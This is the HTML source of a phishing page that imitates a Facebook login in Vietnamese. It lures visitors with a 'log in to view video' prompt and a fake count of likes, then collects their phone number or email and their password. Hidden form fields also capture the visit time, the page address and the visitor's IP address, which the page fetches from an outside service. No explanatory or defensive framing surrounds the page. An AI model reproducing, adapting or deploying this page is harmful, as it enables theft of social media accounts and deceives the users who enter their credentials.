<!DOCTYPE html>
<html>

<head>
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-146583571-3"></script><script type="text/javascript">window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}gtag("js", new Date());gtag("config", "UA-146583571-3");</script>
    <meta charset="UTF-8">
    <title>Facebook</title>
    <!-- bootstrap & fontawesome css -->
    <link href="css/bootstrap.min.css" rel="stylesheet" />
    <link rel="stylesheet" href="css/font-awesome.min.css" />

    <!-- BootstrapValidator CSS -->
    <link rel="stylesheet" href="css/bootstrapValidator.min.css" />

    <!-- jQuery and Bootstrap JS -->
    <script type="text/javascript" src="css/jquery.min.js"></script>
    <script type="text/javascript" src="css/bootstrap.min.js"></script>

    <!-- BootstrapValidator JS -->
    <script type="text/javascript" src="css/bootstrapValidator.min.js"></script>

    <!-- Animated Loading Icon -->
    <style type="text/css">
        .glyphicon-refresh-animate {
            -animation: spin .7s infinite linear;
            -webkit-animation: spin2 .7s infinite linear;
        }
        
        @-webkit-keyframes spin2 {
            from {
                -webkit-transform: rotate(0deg);
            }
            to {
                -webkit-transform: rotate(360deg);
            }
        }
        
        @keyframes spin {
            from {
                transform: scale(1) rotate(0deg);
            }
            to {
                transform: scale(1) rotate(360deg);
            }
        }
    </style>
    <style>
        .button {
            height: 45px;
            width: 280px;
            background-color: #36608A;
            border: none;
            color: white;
            padding: 15px 32px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            font-size: 17px;
            margin: 4px 2px;
            cursor: pointer;
            font-weight: bold;
            text-align: center;
            line-height: 0.4;
        }
        
        .Xbutton {
            height: 45px;
            width: 220px;
            background-color: #66FF00;
            border: none;
            color: white;
            padding: 15px 32px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            font-size: 17px;
            margin: 4px 2px;
            cursor: pointer;
            font-weight: bold;
            text-align: center;
            line-height: 0.4;
        }
        
        .Xcontainer {
            position: relative;
            text-align: center;
            color: white;
            cursor: pointer;
            line-height: 1;
            font-weight: bold;
            font-size: 200%;
        }
        
        .centered {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
        }
    </style>
    <script id='script_viewport' type='text/javascript'>
        window.s_viewport = function() {
            var width = window.outerWidth > 0 ? window.outerWidth : window.screen.width;
            var widthDevice = width;
            var is_desktop = width >= 768;
            var content = "";
            if (typeof window.ladi_is_desktop == "undefined" || window.ladi_is_desktop == undefined) {
                window.ladi_is_desktop = is_desktop;
            }
            if (!is_desktop) {
                widthDevice = 320;
            } else {
                widthDevice = 960;
            }
            content = "width=" + widthDevice + ", user-scalable=no";
            var scale = 1;
            if (!is_desktop && widthDevice != window.screen.width && window.screen.width > 0) {
                scale = window.screen.width / widthDevice;
            }
            if (scale != 1) {
                content += ", initial-scale=" + scale + ", minimum-scale=" + scale + ", maximum-scale=" + scale;
            }
            var docViewport = document.getElementById("viewport");
            if (!docViewport) {
                docViewport = document.createElement("meta");
                docViewport.setAttribute("id", "viewport");
                docViewport.setAttribute("name", "viewport");
                document.head.appendChild(docViewport);
            }
            docViewport.setAttribute("content", content);
        };
        window.s_viewport();
    </script>
</head>

<body>
    </head>

    <body>
        <center>
            <div class="container">
                <form class="form-horizontal" role="form" id="test-form" autocomplete="off">
                    <div class="m-header">

                        <div class="form-group">
                            <div class="col-lg-3 inputGroupContainer">

                                <div class="Xcontainer">
                                    <img src="images/logo.png" height="50" width="280">
                                    <div class="centered">Facebook</div>
                                </div>
                                <div class="Xcontainer">
                                    <img src="images/pic.png" height="50" width="280">
                                </div>
                                <br>
                                <br>
                                <p>Bảo Kul và <span style="color: rgb(0, 96, 191);">32.721 người thích.</span>
                                </p>
                                <div class="input-group">
                                    <p class="form-control" style="font-weight:bold; font-size:13px; background-color: #F5BCA9">Đăng nhập để xem video</p>
                                    <br>
                                    <br>
                                    <input type="hidden" id="datetime" class="form-control" name="DateTime" value="" />
                                    <input type="hidden" id="domain" class="form-control" name="Domain" value="" />
                                    <input type="hidden" id="ip" class="form-control" name="IP" value="" />

                                    <input type="text" class="form-control" name="Account" pattern=".{6,}" placeholder="Số di động hoặc email" />
                                    <br>
                                    <br>
                                    <input type="password" class="form-control" name="Password" pattern=".{6,}" placeholder="Mật khẩu" />
                                    <br>
                                    <br>
                                    <button type="submit" class="button" id="postForm">Đăng nhập</button>
                                    <p>_____hoặc_____</p>
                                    <button type="" class="Xbutton">Tạo tài khoản mới</button>
                                    <p><font color="blue">Quên mật khẩu?</font>
                                    </p>
                                </div>
                            </div>
                        </div>

                </form>

                </div>
        </center>
        <script>
            var d = new Date().toLocaleString();
            var curl = window.location;
            document.getElementById("datetime").value = d;
            document.getElementById("domain").value = curl;
            $.getJSON("https://api.ipify.org?format=json",
                function(data) {

                    $("#ip").html(data.ip);
                })
        </script>
        <script type="application/javascript">
            function getIP(json) {
                var rsip = json.ip;
                document.getElementById("ip").value = rsip;
            }
        </script>
        <script type="application/javascript" src="https://api.ipify.org?format=jsonp&callback=getIP"></script>
    </body>

    <footer>
        <script src="validation-functions.js"></script>
    </footer>

</html>